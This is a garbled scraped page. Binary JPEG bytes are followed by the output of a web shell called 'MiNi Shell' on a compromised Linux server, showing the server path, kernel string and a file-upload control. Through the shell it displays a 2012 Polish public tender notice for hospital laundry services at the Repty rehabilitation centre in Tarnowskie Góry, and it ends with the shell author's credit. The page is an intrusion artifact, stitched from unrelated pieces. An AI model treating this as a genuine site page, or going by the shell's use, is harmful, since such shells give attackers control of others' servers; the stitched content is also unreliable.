JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20120404/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20120404/106160-N-2012.html

<p class="kh_header"><b>Tarnowskie Góry: Usługa prania GCR/20/ZP/2012</b><br>
<b>Numer ogłoszenia: 106160 - 2012; data zamieszczenia: 04.04.2012</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> SP ZOZ "Repty" Górnośląskie Centrum Rehabilitacji im. gen. Jerzego Ziętka , ul. Śniadeckiego 1, 42-604 Tarnowskie Góry, woj. śląskie, tel. 032 3901206, faks 032 3901353.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.repty.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Samodzielny publiczny zakład opieki zdrowotnej.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługa prania GCR/20/ZP/2012.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem zamówienia jest świadczenie usługi prania dla SP ZOZ REPTY Górnośląskiego Centrum Rehabilitacji im. gen. Jerzego Ziętka, zgodnie z obowiązującymi wymaganiami sanitarno - higienicznymi w zakładach opieki zdrowotnej, w ilości średniomiesięcznej 6400 kg.

1.	Zakres usługi:
a)	pranie wodne 
b)	dezynfekcja 
c)	czyszczenie chemiczne
d)	prasowanie 
e)	maglowanie (wymagane w przypadku bielizny szpitalnej pkt. III. 2. lit. a), a także pozostałego asortymentu  z pkt. III. 2. lit. c) wymagającego maglowania)  
f)	usztywnianie 
g)	naprawy krawieckie 
h)	sortowanie i pakowanie 
i)	transport własny Wykonawcy
2.	Asortyment prania:
a)	bielizna szpitalna - poszwy, poszewki, prześcieradła, podkłady;
b)	odzież fasonowa - fartuchy, garsonki, spodnie, bluzy, ubrania drelichowe, koszule flanelowe, T- shirty itp.;
c)	inne - podkłady gumowe, obrusy, firanki, zasłony, ręczniki, ścierki, koce, kołdry, poduszki (wypełnienie z pierza oraz poliestrowo-silikonowe), materace, pokrowce, poduszki przeciwodleżynowe, wałki ortopedyczne, mopy, żaluzje pionowe, rolety okienne, wycieraczki itp.  
d)	bielizna osobista, dzienna i nocna pacjenta (w razie potrzeby);
3.	Terminy:
a)	pranie asortymentu z pkt. III.2. lit. a, b, d). będzie realizowane  w ciągu 48 godzin, licząc od godziny odbioru prania od Zamawiającego;
b)	pranie pozostałego asortymentu (pkt. III.2. lit. c) będzie realizowane  w ciągu 72 godzin, licząc od godziny odbioru prania od Zamawiającego;
c)	termin na wykonanie reklamacji w przypadku stwierdzonych usterek dotyczących jakości usług pralniczych wynosi 72 godz., licząc od godziny poinformowania Wykonawcy o usterkach, a koszty ponownego wykonania usługi ponosi Wykonawca;
d)	Wykonawca ponosi odpowiedzialność za rzeczy uszkodzone w czasie prania, prasowania, maglowania, transportu. Jeżeli uszkodzenie ze względów funkcjonalnych i/lub estetycznych nie pozwala na dalsze użytkowanie asortymentu, Wykonawca ponosi koszty związane z jej odkupieniem;
e)	w przypadku stwierdzenia przez Zamawiającego braków ilościowych, Wykonawca  zobowiązuje się do niezwłocznego (nie dłużej niż 72 godz.) uzupełnienia braków w tym samym asortymencie, kolorze i gatunku;
f)	Wykonawca zobowiązuje się do odbioru brudnego asortymentu codziennie od poniedziałku do piątku z magazynu  brudnej bielizny, w godzinach od 7.00 do 12.00            (w razie potrzeby w soboty i dni wolne od pracy, po wcześniejszym telefonicznym uzgodnieniu między stronami);
g)	Wykonawca zobowiązuje się do dostawy czystego asortymentu, w terminach przewidzianych w pkt. III. 3. lit. a, b)., do magazynu czystej bielizny, w godzinach od 7.00 do 12.00 (w razie potrzeby w soboty i dni wolne od pracy, po wcześniejszym telefonicznym uzgodnieniu między stronami);
h)	Wykonawca jest zobowiązany zapewnić ciągłość realizacji usługi przez cały okres trwania umowy.
4.	W zakres usługi wchodzą także:
a)	rozliczanie się z odebranego i dostarczonego do magazynu asortymentu;
b)	naprawy krawieckie polegające na: przyszywaniu i wymianie guzików, troczków, przyszywaniu rozdartych kieszeni, cerowaniu dziur, przyszywaniu zamków błyskawicznych, zszywaniu rozdartych boków, itp.;
c)	sortowanie i pakowanie w/g asortymentu;
d)	stosowanie opakowania chroniącego przed zanieczyszczeniem, od momentu zakończenia cyklu technologicznego prania do momentu dostarczenia do centralnego magazynu czystej bielizny. Kolorystyka opakowań - białe worki foliowe,       nieprzeźroczyste.
e)	pranie asortymentu skażonego w specjalnie do tego celu przeznaczonej pralnicy.
5.	Transport:
a)	wykonawca będzie odbierał brudne i dostarczał czyste pranie własnym transportem, przystosowanym do realizacji usługi, zgodnie z zachowaniem wymogów stawianych przez właściwego Państwowego Inspektora Sanitarnego;
b)	asortyment skażony będzie odbierany od Zamawiającego przez Wykonawcę bez wytrzepywania, przepierania, dezynfekcji, w zamkniętym opisanym worku koloru czerwonego, pakowany dwuwarstwowo tj. folia, tekstylia;
c)	wewnętrzny transport prania będzie odbywał się w wózkach dostarczonych na czas trwania umowy przez Wykonawcę, w ilości wynikającej z wielkości dostaw, łatwych do przeprowadzenia dezynfekcji;
d)	odzież fasonowa, opakowana w worki foliowe, transportowana będzie na  wieszakach;
e)	osoba odbierająca i dostarczająca pranie obowiązana jest posiadać prawidłowy strój - fartuch i rękawice ochronne.
6.	Pozostałe warunki:
a)	pralnia musi być wyposażona w komorę do dezynfekcji materacy, system pozwalający  na automatyczne dozowanie preparatów piorących i dezynfekcyjnych, przeznaczonych do stosowania w zakładach opieki zdrowotnej (środki stosowane w procesie odkażania, prania, wybielania nie mogą niszczyć/odbarwiać tkanin). 
b)	pranie powinno odbywać się według procedur dostosowanych do stanu zabrudzenia i gwarantujących wysoką jakość wypranych rzeczy (zarówno pod względem bakteriologicznym jak i  higienicznym);
c)	Wykonawca gwarantuje nie mieszanie pranego asortymentu GCR Repty z  praniem innych placówek;
d)	Wykonawca na czas trwania umowy zapewni Zamawiającemu do transportu brudnego prania worki tekstylne w kolorze żółtym. Ilość worków tekstylnych do bieżącego użytku - 200 szt. Tkanina dowolna, worki muszą posiadać możliwość bezpiecznego zamknięcia. Należy dołączyć przykładowy worek do oferty (zostanie zwrócony po zakończeniu przetargu). Worki tekstylne będą przeznaczone tylko i wyłącznie dla GCR Repty.
e)	parametry stelaży na worki tekstylne:  szerokość 45 cm, długość 39 cm, średnica otworu 52 cm, wysokość 79 cm. Dodatkowo Wykonawca dostarczy zaczepy do mocowania worka na stelażu w ilości 100 szt.
f)	asortyment nie nadający się do dalszego użytkowania bądź naprawy winien być zapakowany w oddzielnym worku z opisem kasacja.
7.	Wykonawca zobowiązany będzie dostarczyć Pielęgniarce epidemiologicznej, raz na pół roku w trakcie trwania umowy:
a)	kopię protokółów kontroli sanitarnej,
b)	kopię wyników badań mikrobiologicznych wykonanych w pralni Wykonawcy z magla, regałów na czystą bieliznę, itp.
c)	wykaz zużycia preparatów piorących i dezynfekcyjnych,
d)	 Zamawiający zastrzega sobie prawo do przeprowadzenia wizytacji pralni Wykonawcy, w celu zweryfikowania spełniania przez Wykonawcę wymogów zawartych w niniejszej specyfikacji oraz w złożonej ofercie przetargowej..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje, w okresie  3 lat od udzielenia zamówienia podstawowego, możliwość udzielenia dotychczasowemu Wykonawcy usługi zamówień uzupełniających, o których mowa w art. 67 ust 1 pkt 6  ustawy Pzp, stanowiących nie więcej niż 15 % wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówienia.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 98.31.00.00-9, 98.31.10.00-6, 98.31.50.00-4.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 36.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada pozytywną opinię właściwego Państwowego Inspektora Sanitarnego zgodną z rozporządzeniem Ministra Zdrowia z dnia 2 lutego 2011r w sprawie wymagań, jakim powinny odpowiadać pod względem fachowym i sanitarnym pomieszczenia i urządzenia zakładu opieki zdrowotnej (Dz. U. z 2011r. Nr 31 poz. 158), stwierdzającą spełnienie:
- wymagań sanitarnych do świadczenia usług pralniczych dla zakładów opieki zdrowotnej, 
- wymogów z zakresu prania bielizny szpitalnej oraz  stanu sanitarno - technicznego,
- pozytywną opinię o dopuszczalności środków transportu do przewożenia bielizny szpitalnej. Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonał co najmniej dwie usługi prania w obiekcie szpitalnym o charakterze i złożoności porównywalnej z zakresem zamówienia, każda o wartości brutto nie mniejszej niż 500.000 zł Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że posiada opłacone ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności zgodnej z przedmiotem niniejszego zamówienia na wartość co najmniej 500.000 zł. Ocena spełniania warunków udziału w postępowaniu, o których mowa w art. 22 ust 1 ustawy Pzp, zostanie dokonana wg formuły spełnia - nie spełnia, na podstawie analizy załączonych do oferty dokumentów potwierdzających spełnianie ww. warunków udziału w postępowaniu. Niespełnienie przez Wykonawcę chociażby jednego z warunków udziału w postępowaniu określonych podmiotowo skutkować będzie wykluczeniem Wykonawcy z udziału w tym postępowaniu.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY , USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane dostawy, usługi lub roboty budowlane odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">a). wykaz preparatów piorących  i dezynfekcyjnych, jakie będą stosowane do wykonania usługi zgodnie z obowiązującymi przepisami (załącznik nr 5). Karty charakterystyki należy dostarczyć na każde żądanie Zamawiającego. Środki te powinny być zarejestrowane w Urzędzie Rejestracji Produktów Leczniczych Wyrobów i Produktów Biobójczych oraz  muszą być przeznaczone do prania w  zakładach opieki zdrowotnej,
	b). schemat cyklu technologicznego prania, według własnego schematu Wykonawcy, zgodnie z podziałem asortymentu (wymienionego w pkt. III.2 lit. a - d), z uwzględnieniem preparatów piorących        i dezynfekcyjnych stosowanych w procesie prania,
	c). kopię badania skuteczności procesu dezynfekcji w komorze dezynfekcyjnej, potwierdzoną wskaźnikami biologicznymi umieszczonymi w komorze,
	d). oświadczenie, że Wykonawca  posiada procedury  dotyczące technologii dezynfekcji                    i prania bielizny szpitalnej, transportu, mycia i dezynfekcji całego wyposażenia oraz powierzchni pralni, higieny pracowników (dezynfekcja rąk, stosowanie środków higieny osobistej, zmiany odzieży, podziału pracowników na strefy),
	e). oświadczenie potwierdzające posiadanie  automatycznego systemu dozowania środków piorących i dezynfekcyjnych (do oświadczenia  należy dołączyć opis tego systemu wraz z podaniem jego typu),
	f) oświadczenie, że osoby, które będą uczestniczyć w wykonywaniu zamówienia, posiadają wymagane uprawnienia dotyczące higieny oraz technologii prania.</p></li>



</ul><p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>a). wykaz części zamówienia, których wykonanie zostanie powierzone podwykonawcom (załącznik nr 6),
	b). pisemne zobowiązanie innych podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia w przypadku, gdy Wykonawca polega na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączącego go z nimi stosunków,
c). pełnomocnictwo do podpisywania dokumentów, składania wyjaśnień oraz oświadczeń woli, jeżeli ofertę podpisuje pełnomocnik Wykonawcy, w formie oryginału lub kserokopii poświadczonej notarialnie.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość zmian postanowień niniejszej umowy w stosunku do treści oferty, w przypadku wystąpienia następujących przesłanek:
a) zaistnienia okoliczności, których nie można było przewidzieć w chwili podpisania umowy a zmiana ceny jest korzystna dla Zamawiającego,
b)  zmiany wysokości stawki podatku od towarów i usług (VAT) na usługę będącą przedmiotem niniejszej umowy, powodującej że  niezmienność ceny groziłaby Wykonawcy rażącą stratą.,
       c)  wzrostu minimalnego wynagrodzenia, którego nie dało się przewidzieć w chwili zawarcia  umowy, jeżeli nieuwzględnienie tego wzrostu groziłoby Wykonawcy rażącą stratą.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.repty.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji im. Gen. Jerzego Ziętka
ul. Śniadeckiego 1     42-604 Tarnowskie Góry      
Sekcja zamówień publicznych.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 20.04.2012 godzina 11:00, miejsce: SP ZOZ REPTY Górnośląskie Centrum Rehabilitacji im. Gen. Jerzego Ziętka
ul. Śniadeckiego 1     42-604 Tarnowskie Góry      
Sekcja zamówień publicznych.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com